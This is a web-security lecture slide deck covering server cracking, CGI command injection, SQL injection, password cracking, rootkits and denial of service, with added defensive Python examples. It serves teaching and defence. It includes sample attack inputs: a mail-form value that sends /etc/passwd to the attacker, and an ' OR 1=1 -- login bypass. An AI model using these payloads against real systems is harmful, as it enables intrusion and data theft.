Week 8: Web Security and Privacy - PowerPoint PPT Presentation

Provided by: eelabU
Slides: 20

Transcript and Presenter's Notes

1
Week 8 Web Security and Privacy
  • What are the security and privacy issues on the
    internet/web?
  • Security: avoid intrusion/damage
  • Privacy: protect private information (e.g. credit
    card transactions)
  • How could your web server be compromised? What
    can you do to prevent it?
  • Are you at risk as a web user? What can you do to
    safeguard yourself/your clients?
  • How can a web service protect the integrity of
    its data and offer secure transactions to users?

2
Cracker
  • What would a cracker want to do?
  • See things on your system that are hidden
  • Store things on your system without you knowing
    (warez)
  • Attack your users
  • Use your system as a stepping stone to other more
    interesting servers
  • Deface or otherwise damage your server
  • Just crack because it's there (pwned)
  • The FBI released a warning to websites using
    shopping cart software named "PDG," which was
    utilized by roughly 4,000 websites, after a
    devastating bug was found that reveals all the
    company's customer information. One website,
    SawyerDesign.com, had purchased the software from
    a reseller leaving them out of touch from the
    notifications sent to direct customers. Once the
    site was discovered by carders, they had a field
    day racking up thousands of dollars on customers'
    credit cards ranging from long distance cards to
    domain names. (source: www.hackinthebox.org)

3
How to Crack a Server
  • Cracking a web server means gaining some kind of
    unauthorised access to the server
  • The first requirement is a communication channel
    with the server. Use port scanning to find open
    internet ports on the server and which server
    programs are running
  • Having found a channel we need to exploit it to
    either run a program on the server or read useful
    files such as the password file
  • Exploits typically take advantage of bugs or poor
    coding in servers or associated programs, e.g. a
    CGI script which doesn't check its input properly
  • If we have the password file we can attempt to
    guess the passwords from a dictionary. If we have
    a password we can gain user level access to the
    system
  • Alternatively, we try to run a program on the
    server which exploits a system bug giving us root
    privileges and add ourselves as a new superuser
    account

4
CGI
  • The Common Gateway Interface (CGI) is a standard
    for interfacing external applications with
    information servers, such as HTTP or Web servers.
  • A plain HTML document that the Web daemon
    retrieves is static, which means it exists in a
    constant state: a text file that doesn't change.
  • A CGI program, on the other hand, is executed in
    real-time, so that it can output dynamic
    information.
  • For example, let's say that you wanted to "hook
    up" your Unix database to the World Wide Web, to
    allow people from all over the world to query it.
    Basically, you need to create a CGI program that
    the Web daemon will execute to transmit
    information to the database engine, and receive
    the results back again and display them to the
    client. This is an example of a gateway.
  • The database example is a simple idea, but most
    of the time rather difficult to implement. There
    really is no limit as to what you can hook up to
    the Web. The only thing you need to remember is
    that whatever your CGI program does, it should
    not take too long to process. Otherwise, the user
    will just be staring at their browser waiting for
    something to happen.

5
Open Internet Ports
  • Internet servers, particularly Unix servers, are
    configured with many internet services active by
    default
  • Each service is allocated a TCP or UDP port, e.g.
    ftp      21/tcp
    telnet   23/tcp
    finger   79/tcp   Get info on users
    www      80/tcp   WorldWideWeb HTTP
    pop3    110/tcp   Post Office Protocol
    irc     194/tcp   Internet Relay Chat
  • Each open port is associated with a server
    program, e.g. Apache for port 80, wuftpd for port
    21
  • Knowing what servers are running means we can
    look for standard exploits of these programs or
    try to find new ones

6
Open Internet Ports
  • You can use telnet to connect to any tcp port and
    gain some information about the server program:
    telnet ftp.usyd.edu.au 21
    Trying 137.111.1.11...
    Connected to sunb.usyd.edu.au.
    Escape character is '^]'.
    220-
    220- This is the Sydney University anonymous ftp server.
    220- All transfers are logged, if you don't like this policy then
    220- disconnect now.
    220-
    220-
    220 sunb FTP server (Version wu-2.6.1(2) Sat Dec 1 11:33:49 EST 2001) ready.
  • We now know that ftp.usyd.edu.au runs version
    2.6.1 of wu-ftpd
  • WU-FTPD is an ftp daemon for Unix systems
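The greeting above is a multi-line FTP reply in the RFC 959 format: lines prefixed `220-` continue the reply and the first line prefixed `220 ` (code, space) ends it. The following added example (my code, not part of the slides) parses such a reply and extracts the software version it discloses, which is useful when auditing what your own servers reveal. The banner is constructed to mirror the slide's transcript; the function names and the version regex are my own assumptions.

```python
"""Parse a multi-line FTP greeting and report the server version it discloses.
Added example for auditing your own hosts' banners; not code from the slides."""
import re

# Constructed sample, modelled on the slide's telnet session to port 21.
SAMPLE_BANNER = """220-
220- This is the Sydney University anonymous ftp server.
220- All transfers are logged, if you don't like this policy then
220- disconnect now.
220-
220-
220 sunb FTP server (Version wu-2.6.1(2) Sat Dec 1 11:33:49 EST 2001) ready.
"""

# Assumed pattern for "Version <product>-<version>" as wu-ftpd prints it.
VERSION_RE = re.compile(r"Version\s+(?P<product>[A-Za-z]+)-(?P<version>[\d.]+)")


def parse_reply(text):
    """Return (code, [text lines]) for one FTP reply.

    RFC 959: a multi-line reply starts with 'NNN-' and ends at the first line
    beginning with 'NNN ' (same code, then a space).  Later text belongs to
    the next reply, so parsing stops there.
    """
    lines = text.splitlines()
    if not lines or len(lines[0]) < 3 or not lines[0][:3].isdigit():
        raise ValueError("not an FTP reply")
    code = lines[0][:3]
    body = []
    for line in lines:
        if line.startswith(code + "-"):
            body.append(line[4:].strip())          # continuation line
        elif line.startswith(code + " ") or line == code:
            body.append(line[4:].strip())          # terminating line
            return code, body
        else:
            body.append(line.strip())              # bare continuation text
    raise ValueError("unterminated multi-line reply")


def advertised_version(text):
    """(product, version) from the greeting, or None if nothing is disclosed."""
    _, body = parse_reply(text)
    for line in body:
        m = VERSION_RE.search(line)
        if m:
            return m.group("product"), m.group("version")
    return None


def banner_findings(text):
    """Audit findings for one greeting: wrong code, or a disclosed version."""
    findings = []
    code, _ = parse_reply(text)
    if code != "220":
        findings.append("unexpected greeting code " + code)
    ver = advertised_version(text)
    if ver:
        findings.append("greeting discloses %s version %s" % ver)
    return findings


if __name__ == "__main__":
    for f in banner_findings(SAMPLE_BANNER):
        print(f)
```

Run it against banners captured from your own hosts; a version string in the greeting is exactly what the slide says a cracker looks for, and most daemons let you shorten or remove it in their configuration.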

7
Exploiting Security Holes
  • Large programs have bugs; bugs lead to security
    holes; most internet servers are large programs
  • The aim of an exploit is to either access system
    files (passwords) or run code on the system
  • Two classes of exploit are buffer overflows and
    taking advantage of poor coding in server
    programs or CGI scripts
  • Buffer overflows occur when the amount of data
    sent as input is larger than a predefined buffer
    size in the server program. The cracker can place
    code in the overflowed area which may then be run
    by the program
  • The most useful examples of poor coding are where
    servers or cgi programs call other programs, in
    particular shell scripts

8
WU-FTPD Exploit http://www.wu-ftpd.org/
  • WU-FTPD File Globbing Denial of Service
    Vulnerability
  • Remote exploitation of an input validation
    vulnerability in version 2.6.2 of WU-FTPD could
    allow for a denial of service of the system by
    resource exhaustion.
  • The vulnerability specifically exists in the
    wu_fnmatch() function in wu_fnmatch.c.
  • When a pattern containing a '*' character is
    supplied as input, the function calls itself
    recursively on a smaller substring. By supplying
    a string which contains a large number of '*'
    characters, the system will take a long time to
    return the results, during which time it will be
    using a large amount of CPU time.
  • Buffer Overflow Exploit Wu-ftpd is vulnerable to
    a very serious remote attack in the SITE EXEC
    implementation. Because of user input going
    directly into a format string for a printf
    function, it is possible to overwrite important
    data, such as a return address, on the stack.
    When this is accomplished, the function can jump
    into shellcode pointed to by the overwritten eip
    and execute arbitrary commands as root. (Source
    SecurityFocus.com) SecurityFocus.com provides
    example C programs which take advantage of this
    exploit

9
Exploiting CGI Scripts
  • Many web servers come with some example scripts
    which show CGI features but which are vulnerable
    if left in place.
  • Other programs are widely used, eg. discussion
    servers, web mail forms, etc. Knowing that they
    are there enables exploits to be attempted
  • For example, suppose the script builds a shell
    command from the form fields (pseudo-code):
    to = form['to']
    subj = form['subj']
    body = form['body']
    exec("echo '$body' | /usr/bin/mail -s $subj $to")
  • If the input to 'to' is
    john_at_gmail.com; mail john_at_gmail.com < /etc/passwd
    the command run by the CGI script is
    echo 'some message' | /usr/bin/mail -s crack john_at_gmail.com; \
      mail john_at_gmail.com < /etc/passwd
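The mail form above is the classic CGI command-injection pattern from slides 4 and 9: form fields go straight into a shell command line. The following added example (my code, not the slides' script) shows the minimal CGI input handling, the vulnerable shell-string builder, and a hardened version that validates the recipient and passes arguments as an argv list so no shell ever parses the fields. The `runner` callable stands in for `subprocess.run(argv, input=body)` so the example runs offline; names, the address pattern and the sample values are my own assumptions.

```python
"""CGI mail form: vulnerable shell-string version beside a hardened version.
Added example; not code from the original slides."""
import re
from urllib.parse import parse_qs

# Constructed input in the slide's pattern: a ';' ends the mail command and
# starts a second one that would mail the password file to the attacker.
INJECTED_TO = "john@example.com; mail john@example.com < /etc/passwd"


def read_form(environ):
    """Minimal CGI input handling for a GET form: fields live in QUERY_STRING."""
    return {k: v[0] for k, v in parse_qs(environ.get("QUERY_STRING", "")).items()}


def build_shell_command(to, subj, body):
    """Vulnerable: interpolates untrusted fields into one shell command line."""
    return "echo '%s' | /usr/bin/mail -s %s %s" % (body, subj, to)


SHELL_META = set(";|&$`<>\n\"'\\")


def has_shell_metachars(value):
    """Handy for logging/alerting: does a field contain shell syntax?"""
    return any(ch in SHELL_META for ch in value)


# Assumed allow-pattern: one plain address, nothing else.
ADDRESS_RE = re.compile(r"^[A-Za-z0-9._+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def validate_address(value):
    if not ADDRESS_RE.match(value):
        raise ValueError("invalid recipient: %r" % value)
    return value


def build_argv(to, subj, body):
    """Hardened: an argv list for subprocess.run(argv, input=body).  Without a
    shell, ';', '|' and '<' are just bytes inside an argument or stdin."""
    return ["/usr/bin/mail", "-s", subj, validate_address(to)], body


def send_mail(to, subj, body, runner):
    """runner(argv, stdin_text) -> exit status; injected so tests stay offline."""
    argv, stdin_text = build_argv(to, subj, body)
    return runner(argv, stdin_text)


def handle_request(environ, runner):
    """Top-level CGI handler: read fields, validate, hand off to the mailer."""
    form = read_form(environ)
    try:
        rc = send_mail(form.get("to", ""), form.get("subj", ""),
                       form.get("body", ""), runner)
    except ValueError as exc:
        return ("rejected", str(exc))
    return ("sent", rc)


if __name__ == "__main__":
    print("vulnerable command line would be:")
    print("  " + build_shell_command(INJECTED_TO, "crack", "some message"))
    print("hardened handler says:",
          handle_request({"QUERY_STRING": "to=" + INJECTED_TO}, lambda a, s: 0))
```

Two controls are at work: an allow-list on the one field that must have a fixed shape (the recipient), and removal of the shell from the call path for all fields. Either alone is weaker; a subject line with a `;` is harmless once there is no shell to interpret it, and the validation catches the case where the recipient is later used somewhere a shell is unavoidable.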

10
An Example CGI Exploit
  • FormMail.pl Web-to-Email CGI Script Allows
    Unauthorized Users to Send Mail (e.g., spam)
    Anonymously
  • http://securitytracker.com/alerts/2001/Mar/1001108.html
  • Security Tracker describes an exploit to a common
    script formmail.pl which sends email via a web
    form
  • The script trusts its input and sends a mail;
    this allows SPAM email to be sent via the form
  • From the web server log:
    64-187-39-131.powergate.ca - - [20/Feb/2003:11:46:32 +1100]
    "GET http://www.shlrc.usyd.edu.au/cgi-bin/FormMail.cgi?
    email=FormMail_at_mail.com&recipient=<formmailss_at_aol.com> shlrc.usyd.edu.au
    &subject=www.shlrc.mq.edu.au/cgi-bin/FormMail.cgi&date/time=Wed/Feb/19/7:46pm
    HTTP/1.0" 404 214 "-" "Mozilla/??"
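The log line above is the detection opportunity: a FormMail request whose `recipient` is supplied by the client and points outside the site's own domain. The following added example (my code, not from the slides or the advisory) parses Common Log Format lines and flags such requests. The sample lines are constructed in the shape of the slide's excerpt, and `LOCAL_DOMAINS` is an assumed allow-list of domains the form may legitimately mail.

```python
"""Flag FormMail.cgi requests with an external 'recipient' in a web server log.
Added example; not code from the original slides."""
import re
from urllib.parse import parse_qs, urlsplit

# Common/Combined Log Format: host ident user [time] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

# Assumed: domains the form is allowed to deliver to.
LOCAL_DOMAINS = ("shlrc.usyd.edu.au",)

# Constructed sample log, modelled on the slide's excerpt.
SAMPLE_LOG = """\
64-187-39-131.example.net - - [20/Feb/2003:11:46:32 +1100] "GET http://www.shlrc.usyd.edu.au/cgi-bin/FormMail.cgi?email=FormMail%40mail.com&recipient=%3Cspammer%40example.org%3E&subject=test HTTP/1.0" 404 214 "-" "Mozilla/??"
10.0.0.5 - - [20/Feb/2003:11:47:01 +1100] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
10.0.0.9 - - [20/Feb/2003:11:48:10 +1100] "GET /cgi-bin/FormMail.cgi?recipient=webmaster%40shlrc.usyd.edu.au&subject=hi HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Dict of log fields, or None for lines that are not in CLF."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def recipient_domain(addr):
    """Domain part of an address, tolerating the angle-bracket form."""
    addr = addr.strip().strip("<>")
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def formmail_findings(log_text, local_domains=LOCAL_DOMAINS):
    """(host, time, recipient) for each FormMail request mailing off-site."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])      # absolute or path-only targets
        if not url.path.lower().endswith("formmail.cgi"):
            continue
        for addr in parse_qs(url.query).get("recipient", []):
            if recipient_domain(addr) not in local_domains:
                findings.append((rec["host"], rec["time"], addr))
    return findings


if __name__ == "__main__":
    for host, when, addr in formmail_findings(SAMPLE_LOG):
        print("%s %s tried to relay mail to %s" % (when, host, addr))
```

Note that the slide's real line returned 404: the script was not even installed on that host, yet the probe still shows up. A rule like this therefore also catches scanning for FormMail across many sites, not only successful abuse, and the same `recipient` allow-list logic belongs inside the form script itself.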

11
SQL Injection
  • SQL Injection is a form of CGI exploit that takes
    advantage of poorly coded database interfaces.
  • Allows access to the server database, to insert,
    delete or retrieve data
  • Some database systems can allow remote execution
    of arbitrary programs
  • Well developed techniques and systems for finding
    vulnerabilities
  • A SQL injection attack consists of insertion or
    "injection" of a SQL query via the input data
    from the client to the application. A successful
    SQL injection exploit can read sensitive data
    from the database, modify database data
    (Insert/Update/Delete), execute administration
    operations on the database (such as shutdown the
    DBMS), recover the content of a given file
    present on the DBMS file system and in some cases
    issue commands to the operating system. SQL
    injection attacks are a type of injection attack,
    in which SQL commands are injected into
    data-plane input in order to effect the execution
    of predefined SQL commands.
  • Example exploit on YouTube
    http://www.youtube.com/watch?v=MJNJjh4jORY
  • sqlmap is an open source SQL injection tool
  • http://sqlmap.sourceforge.net/

12
SQL Injection
  • user = form.get_value("user")
    password = form.get_value("password")
    query = "SELECT * FROM users WHERE user='" + user + "'" \
            " AND password='" + password + "'"
    cur.execute(query) ...
  • If user = "hacker" and password = "' OR 1=1 --"
    SELECT * FROM users WHERE user='hacker' AND
    password='' OR 1=1 --'
  • user = form.get_value("user")
    password = form.get_value("password")
    query = "SELECT * FROM users WHERE user=? AND password=?"
    cur.execute(query, (user, password)) ...
  • If user = "hacker" and password = "' or 1=1 --"
    SELECT * FROM users WHERE user='hacker' AND
    password='\' or 1=1 --'
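To make the two versions above concrete, the following added example (my code, not the slides') runs both login queries against an in-memory SQLite table with the slide's `' OR 1=1 --` password. With string concatenation the comment marker swallows the closing quote and `OR 1=1` matches every row; with placeholders the driver sends the value separately, so it is compared as a literal password and matches nothing. Table contents and function names are constructed for the example.

```python
"""The slide's two login queries run against a real (in-memory) database.
Added example; not code from the original slides."""
import sqlite3


def make_db():
    """Constructed users table with one legitimate account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    conn.commit()
    return conn


def login_concat(conn, user, password):
    """Vulnerable: SQL text assembled from the inputs (slide's first version)."""
    query = ("SELECT * FROM users WHERE user='" + user +
             "' AND password='" + password + "'")
    return conn.execute(query).fetchall()


def login_param(conn, user, password):
    """Safe: placeholders; the values never become part of the SQL grammar."""
    query = "SELECT * FROM users WHERE user=? AND password=?"
    return conn.execute(query, (user, password)).fetchall()


def demo():
    """Run both versions with the slide's inputs; returns rows each one sees."""
    conn = make_db()
    user, password = "hacker", "' OR 1=1 --"
    return {
        "concat": login_concat(conn, user, password),
        "param": login_param(conn, user, password),
        "param_legit": login_param(conn, "alice", "s3cret"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print("%-12s -> %r" % (name, rows))
```

Parameterisation is not escaping: the `'\'` shown on the slide is only an illustration of the effect. The driver hands the query text and the values to the database separately, so no quoting rule has to be right for the comparison to be safe.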

13
Cracking Passwords
  • On unix systems, passwords are stored in
    encrypted form in the /etc/passwd file (or more
    recently in /etc/shadow)
  • The stored password is the result of encrypting a
    constant string repeatedly using an encryption
    key derived from the typed password
  • Since the raw password is not stored, to find a
    password you need to try encoding many passwords
    and comparing against the stored passwords
  • Use a dictionary or word list and try simple
    variations such as adding numbers. Other systems
    have used generators of 'pronounceable' strings
  • The standard crypt program on unix has a built in
    delay to make bulk checking slow but a cracker
    can remove this and check thousands of words very
    quickly
  • Once a cracker has user access to a machine they
    can log in as usual
  • Now a whole new range of security exploits are
    possible, involving non-server programs
  • The ultimate goal of the cracker is to get root
    access to the machine
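The slide's point is that the stored value is a one-way transform of the password, so every guess costs one run of the transform, and the defender's lever is to make that run deliberately expensive. The following added example (my code, not the slides') implements salted, iterated PBKDF2 hashing with a verify function, plus the kind of weak-password audit an administrator runs against their own password database, which performs exactly the per-guess work the slide describes. Format, parameter names and the wordlist are my own assumptions.

```python
"""Salted, iterated password hashing and a wordlist audit.
Added example; not code from the original slides."""
import hashlib
import hmac
import os
import time

# Cost factor; raise it until one verify takes roughly 0.1 s on your hardware.
ITERATIONS = 200_000


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Return 'pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>'.
    The salt makes a precomputed dictionary useless across accounts."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recompute with the stored salt/iterations and compare in constant time."""
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unknown hash format")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)


def audit_against_wordlist(stored, wordlist):
    """Administrator's weak-password check: returns the matching word or None.
    Each candidate costs a full PBKDF2 run, which is the whole point."""
    for word in wordlist:
        if verify_password(word, stored):
            return word
    return None


def cost_of_guess(stored):
    """Seconds one verification takes here; guesses/second is its inverse."""
    start = time.perf_counter()
    verify_password("not-the-password", stored)
    return time.perf_counter() - start


if __name__ == "__main__":
    stored = hash_password("letmein1")                      # constructed value
    print("per-guess cost: %.4f s" % cost_of_guess(stored))
    print("weak:", audit_against_wordlist(stored, ["password", "letmein1"]))
```

The crypt(3) scheme on the slide had the same structure with a fixed, small work factor that modern hardware runs millions of times per second; a tunable iteration count (or a memory-hard function such as scrypt or Argon2) is how that built-in delay is kept meaningful today.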

14
Network Packet Sniffing
  • If a cracker has root access to the machine, a
    next step might be to look for more access on the
    local network
  • The cracker may try the passwords gained on other
    machines on the local network abusing the trust
    between local machines
  • Another option is to listen on the Ethernet for
    user traffic. The goal is to see a user's
    login/password going past on the network to gain
    access to other machines
  • To do this the cracker needs to put the ethernet
    interface into promiscuous mode. This (normally)
    requires root access
  • Packet sniffing can happen anywhere on the route
    between client and server -- e.g. on an ISP router
    machine

15
Automated Cracking Script Kiddies
  • Some exploits are so well known that the
    procedure for carrying them out is encoded in
    so-called root kits
  • These are scripts and programs that can be run to
    break into a vulnerable system, install a
    backdoor or trojan and then conceal the intrusion
  • The availability of these root kits leads to a
    group of crackers (script kiddies) who are just
    in it for the thrill. It also enables widespread
    cracking of systems by automated agents
  • Programs like chkrootkit check system binaries
    for rootkit modification
  • Read Rootkits (Wikipedia)
    http://en.wikipedia.org/wiki/Rootkit

16
http://www.chkrootkit.org/
  • chkrootkit is a tool to locally check for signs
    of a rootkit. It contains:
  • chkrootkit: shell script that checks system
    binaries for rootkit modification.
  • ifpromisc.c: checks if the interface is in
    promiscuous mode.
  • chklastlog.c: checks for lastlog deletions.
  • chkwtmp.c: checks for wtmp deletions.
  • check_wtmpx.c: checks for wtmpx deletions.
    (Solaris only)
  • chkproc.c: checks for signs of LKM trojans.
  • chkdirs.c: checks for signs of LKM trojans.
  • strings.c: quick and dirty strings replacement.
  • chkutmp.c: checks for utmp deletions.
  • A rootkit is a program (or combination of several
    programs) designed to take fundamental control
    (in Unix terms "root" access, in Windows
    "Administrator" access) of a computer system,
    without authorization by the system's owners and
    legitimate managers.
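Two of the chkrootkit checks listed above are simple enough to show in full: comparing system binaries against a known-good baseline, and testing an interface for promiscuous mode (the sniffing precondition from slide 14). The following added example (my code, not chkrootkit's) does both. The baseline/verify functions run here against files in a temporary directory standing in for `/bin`; the promiscuous-mode test interprets the flags word Linux exposes in `/sys/class/net/<iface>/flags`, with `IFF_PROMISC` taken from `<linux/if.h>`. Names are my own.

```python
"""Binary integrity baseline and promiscuous-mode flag check, in the spirit of
chkrootkit's 'chkrootkit' script and ifpromisc.c.  Added example; not the
project's own code."""
import hashlib
import os
import tempfile

IFF_PROMISC = 0x100   # from <linux/if.h>


def is_promiscuous(flags_text):
    """Interpret the contents of /sys/class/net/<iface>/flags, e.g. '0x1103'."""
    return bool(int(flags_text.strip(), 16) & IFF_PROMISC)


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(paths):
    """{path: sha256} taken while the system is known to be clean."""
    return {p: sha256_file(p) for p in paths}


def check_binaries(baseline):
    """Compare the live files with the baseline; returns {path: problem}."""
    problems = {}
    for path, expected in baseline.items():
        if not os.path.exists(path):
            problems[path] = "missing"
        elif sha256_file(path) != expected:
            problems[path] = "modified"
    return problems


def demo():
    """Self-contained run: fake /bin in a temp dir, take a baseline, then
    'trojan' ps and delete ls the way a rootkit install would, and re-check."""
    with tempfile.TemporaryDirectory() as d:
        ps, ls = os.path.join(d, "ps"), os.path.join(d, "ls")
        for p in (ps, ls):
            with open(p, "wb") as f:
                f.write(b"original binary " + os.path.basename(p).encode())
        baseline = build_baseline([ps, ls])
        with open(ps, "wb") as f:
            f.write(b"replacement ps that hides the intruder's processes")
        os.remove(ls)
        return {os.path.basename(k): v for k, v in check_binaries(baseline).items()}


if __name__ == "__main__":
    print(demo())
    print("promisc:", is_promiscuous("0x1103"))
```

The baseline must live somewhere the intruder cannot rewrite (read-only media or another host), and the hashing tool itself can be trojaned on a compromised box, which is why chkrootkit ships its own `strings` replacement and why booting from known-good media is the reliable way to run such checks.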

17
Trojan Horses
  • Named after the Trojan Horse used by the Greeks
    to sack Troy
  • Programs that look harmless or useful but contain
    hidden features
  • The user may not know that the program hides
    information
  • E.g. a trojaned ps command may not display
    running processes initiated by the intruder
  • The user may believe that the system is safe
  • The program may produce specific behaviour
  • E.g. a trojaned passwd that grants root shell if
    rootkit password is entered as current password

18
Denial of Service Attacks
  • DOS attacks seek to harm a user or a site by
    making them unusable in some way
  • A DOS attack on a web server can come from
    outside, it doesn't require access to the machine
  • A common DOS attack is carried out by flooding a
    host with network traffic or by sending special
    TCP packets to the host
  • Recently we have seen Distributed DOS attacks
    where many machines are cracked into and used as
    sources in the DOS attack against one host (e.g.
    Trin00)
    http://staff.washington.edu/dittrich/misc/trinoo.analysis
  • DOS attacks can also be carried out by triggering
    a system bug, e.g. the Microsoft Windows 95 TCP/IP
    Address out-of-band bug
    http://support.microsoft.com/kb/q168747/
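Flooding attacks are the one class on this slide where the server itself has a cheap first line of defence: bounding how many requests it will serve per source. The following added example (my code, not from the slides) implements a per-source token bucket and replays a constructed sequence of timestamped requests through it so the effect on a flooder versus an ordinary client can be seen. Rates, burst sizes and the sample events are assumptions.

```python
"""Per-source token-bucket rate limiting replayed over a request timeline.
Added example; not code from the original slides."""
import collections


class TokenBucket:
    """Allows up to `burst` requests at once and `rate` per second sustained."""

    def __init__(self, rate, burst):
        self.rate, self.burst = float(rate), float(burst)
        self.tokens, self.last = float(burst), None

    def allow(self, now):
        if self.last is None:
            self.last = now
        # refill for the time elapsed, capped at the burst size
        self.tokens = min(self.burst, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False


class PerSourceLimiter:
    """One bucket per source address (creating buckets lazily)."""

    def __init__(self, rate, burst):
        self.rate, self.burst, self.buckets = rate, burst, {}

    def allow(self, src, now):
        bucket = self.buckets.get(src)
        if bucket is None:
            bucket = self.buckets[src] = TokenBucket(self.rate, self.burst)
        return bucket.allow(now)


def replay(events, rate, burst):
    """events: (timestamp, source) pairs in time order, e.g. rebuilt from a
    web server log.  Returns {source: (allowed, dropped)}."""
    limiter = PerSourceLimiter(rate, burst)
    stats = collections.defaultdict(lambda: [0, 0])
    for when, src in events:
        stats[src][0 if limiter.allow(src, when) else 1] += 1
    return {src: tuple(counts) for src, counts in stats.items()}


# Constructed timeline: one source fires 100 requests in the same instant,
# a normal client makes one request per second.
SAMPLE_EVENTS = sorted(
    [(0.0, "198.51.100.7")] * 100 +
    [(float(t), "192.0.2.10") for t in range(5)])


if __name__ == "__main__":
    for src, (ok, dropped) in replay(SAMPLE_EVENTS, rate=10, burst=20).items():
        print("%-14s allowed=%3d dropped=%3d" % (src, ok, dropped))
```

A limiter like this protects the expensive part of the server (CGI, database) from a single noisy source, which is the flood case the slide describes first. It does nothing against a distributed flood that saturates the link, or against the malformed-packet bugs in the last bullet; those are handled upstream of the host and by patching respectively.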

19
More reading
  • The WWW Security FAQ
    http://www.w3.org/Security/Faq/www-security-faq.html
  • The Unofficial Web Hack FAQ provides more
    'underground' info but might be getting dated
    now.
    http://www.nmrc.org/pub/faq/hackfaq/index.html
  • More white hat info from securityfocus.com, which
    has current information on system vulnerabilities
    http://www.securityfocus.com/
  • The Jargon File, otherwise known as the Hacker's
    Dictionary, defines many terms like hack, crack
    and warez d00dz
    http://www.catb.org/esr/jargon/html/